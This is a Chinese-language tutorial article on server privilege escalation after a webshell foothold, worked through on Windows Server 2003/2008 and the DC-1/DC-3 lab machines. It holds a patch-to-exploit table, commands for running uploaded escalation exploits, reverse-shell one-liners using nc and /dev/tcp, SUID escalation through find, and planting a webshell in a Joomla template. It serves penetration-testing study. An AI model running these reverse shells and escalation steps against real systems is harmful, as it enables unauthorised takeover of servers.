您当前的位置:首页 > 电脑百科 > 安全防护 > 服务器/网站

服务器提权

时间:2020-09-14 13:08:13  来源:  作者:
服务器提权

 

当拿到WebShell 之后,下⼀步⼲什么?

权限提升

通过一些最初的漏洞利⽤途径,攻击者将获得⼀定的访问权限。接着,攻击者将逐步探

查其破坏的系统来获得⽐最初更多的权限,以期望从其他账户访问敏感信息,甚⾄获得

对整个系统的完全管理控制。当攻击者以这种⽅式扩⼤其最初的未经授权访问的权限

时,将其⾏为称为权限提升攻击。简单来说,就是获取⽐最初更多的权限,甚⾄系统权限。

 

⽔平权限提升(越权)

我们假设攻击者已经获得了在线银⾏账户的访问权限,他的⽬的是窃取⾦钱,但他从这⼀账户中窃

取的⾦钱并不多。这时,他就会寻找信息或者尝试各种漏洞利⽤途径来获得对其他账户的访问权

限。这称之为⽔平权限提升,因为攻击者是在具有相似权限的账户中横向移动。

 

垂直权限提升

通常攻击者的动机是完全控制计算机系统(管理员权限),以便可以任意使⽤系统。当攻击者⾸先从

被攻击的⽤户账户开始并能够将其拥有的单⼀⽤户扩⼤或提升完全管理权限或“根”权限时,我们称

这类攻击为垂直权限提升。

 

windows 提权

针对于很多windows 系统,有时候会安装Web 套件(phpStudy),Web 套件的权限是⽐较⾼的。

操作系统漏洞提权

根据没有修补的补丁号码,直接提权即可。

补丁:kb

漏洞公告:MS

补丁与漏洞对照表

KB2360937 MS10-084
KB2478960 MS11-014KB2507938 MS11-056KB2566454 MS11-062KB2646524 MS12-003KB2645640 MS12-009KB2641653 MS12-018KB944653 MS07-067KB952004 MS09-012 PR
KB971657 MS09-041KB2620712 MS11-097KB2393802 MS11-011kb942831 MS08-005KB2503665 MS11-046KB2592799 MS11-080KB956572 MS09-012 巴⻄烤⾁
KB2621440 MS12-020KB977165 MS10-015 Ms Viru
KB4013081 MS17-017KB3139914 MS16-032KB3124280 MS16-016KB3134228 MS16-014KB3079904 MS15-097KB3077657 MS15-077KB3045171 MS15-051KB3000061 MS14-058KB2829361 MS13-046KB2850851 MS13-053 EPATHOBJ 0day 限32位
KB2707511 MS12-042 sysret -pid
KB2124261 KB2271195 MS10-065 IIS7
KB3198234 MS16-135KB970483 MS09-020 IIS6
KB3031432 MS15-015

Windows Server 2003:

服务器提权

 

Window Server 2008访问:

password:black

服务器提权

 


服务器提权

 


服务器提权

 

未执行,权限过低

服务器提权

 

手动上传一个提权工具:

服务器提权

 


服务器提权

 

systeminfo>C:WindowsTempa.txt&(for %i in (KB3057191 KB2840221 KB3000061
KB2850851 KB2711167 KB2360937 KB2478960 KB2507938 KB2566454 KB2646524KB2645640 KB2641653 KB944653 KB952004 KB971657 KB2620712 KB2393802 KB942831KB2503665 KB2592799 KB956572 KB977165 KB2621440) do @type
C:WindowsTempa.txt|@find /i "%i"|| @echo %i Not Installed!)&del /f /q /a
C:WindowsTempa.txt

 

服务器提权

 

根据补丁与漏洞对照表,可选择PR 提权。(具体提权原理涉及到Windows 系统底层知识,此处不再赘述,只需要使⽤提权EXP 即可)

服务器提权

 

/c C:/Inetpub/ewebeditorv280/uploadfile/pr.exe "whoami"

 

服务器提权

 

Windows Server 2008:

执⾏以下命令

systeminfo>C:WindowsTempa.txt&(for %i in (KB3124280 KB3143141 KB3134228
KB3079904 KB3077657 KB3124280 KB3045171 KB2829361 KB3000061 KB2850851KB2707511 KB970483 KB2124261 KB2271195 KB3031432) do @type
C:WindowsTempa.txt|@find /i "%i"|| @echo %i Not Installed!)&del /f /q /a
C:WindowsTempa.txt

根据补丁对照表,我们选择MS15-051。

上传EXP (注意上传到可写⽬录)并提权!

服务器提权

 

数据库提权

核⼼思路:利⽤数据库执⾏系统命令。

MSSQL 提权

需要提供sa ⽤户密码。

 

服务器提权

 

MySQL 提权

需要知道root ⽤户密码。
MySQL udf 提权MySQL mof 提权
服务器提权

 


服务器提权

 


服务器提权

 

反弹Shell

由于WebShell (正向Shell)是基于HTTP 的,不是持久性链接。

可以通过反弹Shell 的⽅法获得持久性连接(基于TCP 协议的),⽅便与对⽅进⾏通信。

反弹shell ,让对⽅主动来连接“我”。

windows 平台

windows 平台需要借助 nc.exe ⼯具。

# 本地监听 2333 端⼝
nc.exe -lnvp 2333
ncat -lnvp 2333
# 服务器端反弹Shell
nc.exe -e cmd.exe 192.168.10.10 2333
ms15-051.exe "nc.exe -e cmd.exe 192.168.16.104 2333"

 

服务器提权

 


服务器提权

 

反弹成功:

服务器提权

 

提权:

服务器提权

 

linux平台

在获得⽬标系统WebShell 的情况下

# 本地监听2333 端⼝
ncat -lnvp 2333
# 服务端反弹shellnc -e /bin/bash 192.168.16.100 2333
不需要-e参数的情况:rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.16.100 2333
>/tmp/f
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc 192.168.16.100 2333
>/tmp/f
/bin/sh -i >& /dev/tcp/192.168.16.100/2333 0>&1

Linux 提权

SUID 提权

⽬标环境:DC1

服务器提权

 

SUID 的概念:具有SUID 标识的命令,在执⾏期间拥有所有者权限。

特点:简单、快速。

进⼊交互式Shell

Python --version
python -c 'import pty;pty.spawn("/bin/bash")'

系统中具有SUID 标识的命令都有哪些

find / -perm -4000 2>/dev/null
www-data@DC-1:/var/www$ ls -alh /usr/bin/find
ls -alh /usr/bin/find-rwsr-xr-x 1 root root 159K Jan 6 2012 /usr/bin/find
www-data@DC-1:/var/www$
# find 命令在执⾏期间具有root 权限

⽤find 命令调⽤bash

find /tmp/ajest -exec "/bin/bash" ;
find /tmp/ajest -exec "/bin/sh" ;

其他可以提权(调⽤Shell)命令

vim
gitnmap...

注意:先前文章已有详细介绍,这里不再赘述!

操作系统漏洞提权

⽬标环境:DC3

服务器提权

 


服务器提权

 


服务器提权

 


服务器提权

 

searchsploit joomla 3.7.0
服务器提权

 

getShell:

写入一句话木马,通过蚁剑连接:

# 如果以管理员身份登录joomla ,就可以编辑后台脚本(php)⽂件。
# 修改⽹站后台脚本⽂件的位置
Extensions|Templates|Templates|Beez3 Details and Files
http://192.168.16.109/templates/beez3/html/config.php

 

服务器提权

 


服务器提权

 

普通权限,提权:

上传提权脚本

服务器提权

 

.sh:检查系统中存在哪些可以利用的提权漏洞

服务器提权

 


服务器提权

 

提权成功:

服务器提权

 

获取DC3的flag:

服务器提权

 

=== Well Done!===



Tags:服务器提权   点击:()  评论:()
声明:本站部分内容及图片来自互联网,转载是出于传递更多信息之目的,内容观点仅代表作者本人,如有任何标注错误或版权侵犯请与我们联系(Email:2595517585@qq.com),我们将及时更正、删除,谢谢。
▌相关推荐
当拿到WebShell 之后,下⼀步⼲什么?权限提升通过一些最初的漏洞利⽤途径,攻击者将获得⼀定的访问权限。接着,攻击者将逐步探查其破坏的系统来获得⽐最初更多的权限,以期望从其他...【详细内容】
2020-09-14  Tags: 服务器提权  点击:(197)  评论:(0)  加入收藏
▌简易百科推荐
在最近的一波攻击中,黑客利用多个插件中未修补的漏洞攻击了 160 万个 WordPress 网站。 易受攻击的插件对 WordPress 网站产生了的巨大攻击数据。 Wordfence 最近发现 WordPr...【详细内容】
2021-12-16  蚁安    Tags:WordPress   点击:(8)  评论:(0)  加入收藏
事件起因从安全分析系统里面发现一条带有病毒的下载,然后针对这条记录展开了一系列的分析分析过程1.登录到被感染服务器,查看系统状况,hadoop 这个用户在 2020/6/18 20:32 从这...【详细内容】
2021-11-23  Z2990Lig    Tags:SSH   点击:(32)  评论:(0)  加入收藏
1、除了服务器需要用的一些正规软件,其它都不要安装。2、在用户中把administrator改名,这样做的目的是即使对方暴破了我们的密码用户名也不容易猜住,相当于又加了一道关卡。...【详细内容】
2021-11-01  IT小哥吧    Tags:服务器   点击:(37)  评论:(0)  加入收藏
账户安全(1)更名administrator本地用户并禁用guest账户步骤:点击“开始”,找到“管理工具”,点击里面的“计算机管理”,找到“本地用户和组” (2)设定账户锁定策略尝试5次失败...【详细内容】
2021-10-12  Kali与编程  今日头条  Tags:Windows主机   点击:(62)  评论:(0)  加入收藏
本文主要介绍以Microsoft的Windows Server 2019 ,版本:Datacenter(Domain Controller)安全加固保护.企业随着规模不断扩大,业务增多,信息安全建设是企业里一条只有重点没有终点...【详细内容】
2021-09-17  Vireshark    Tags:服务器安全   点击:(64)  评论:(0)  加入收藏
目录常见共享命令IPC$IPC$的利用条件1:开启了139、445端口2:目标主机开启了IPC$共享3:IPC连接报错IPC空连接空连接可以做什么?(毫无作用)IPC$非空连接IPC$非空连接可以做什么?di...【详细内容】
2021-09-16  网络说安全    Tags:系统安全   点击:(86)  评论:(0)  加入收藏
昨天一个老哥找到我,说他的服务器这几天一直被CC攻击,问我这边有没有什么解决的方法? 近年来,网络攻击事件越来越频繁,最常见的就是CC攻击和DDOS攻击,主要的区别就是针对的对象不...【详细内容】
2021-09-10  小蚁GDRAGON    Tags:cc攻击   点击:(58)  评论:(0)  加入收藏
网站页面上的登录操作,通常都是输入帐号密码,传输至网站后台验证。在网站页面、数据传输中,通过技术手段,都可以得到用户输入的信息,并可以修改,从而发起网络攻击。典型的如:使用自...【详细内容】
2021-08-30  修丹道的程序猿    Tags:登录方式   点击:(62)  评论:(0)  加入收藏
网络安全研究人员披露了一类影响主要 DNS 即服务 (DNSaaS) 提供商的新漏洞,这些漏洞可能允许攻击者从企业网络中窃取敏感信息。基础设施安全公司 Wiz 的研究人员 Shir Tamar...【详细内容】
2021-08-12  零日时代    Tags:漏洞   点击:(66)  评论:(0)  加入收藏
001暴力破解1. 指定用户名爆破密码传统型爆破思路,用户名可以通过猜测或者信息收集获得。猜测:admin、网站域名等信息收集:新闻发布人、whoami等2. 指定密码爆破用户名如果是后...【详细内容】
2021-07-23  KaliMa  今日头条  Tags:登陆框   点击:(85)  评论:(0)  加入收藏
相关文章
    无相关信息
最新更新
栏目热门
栏目头条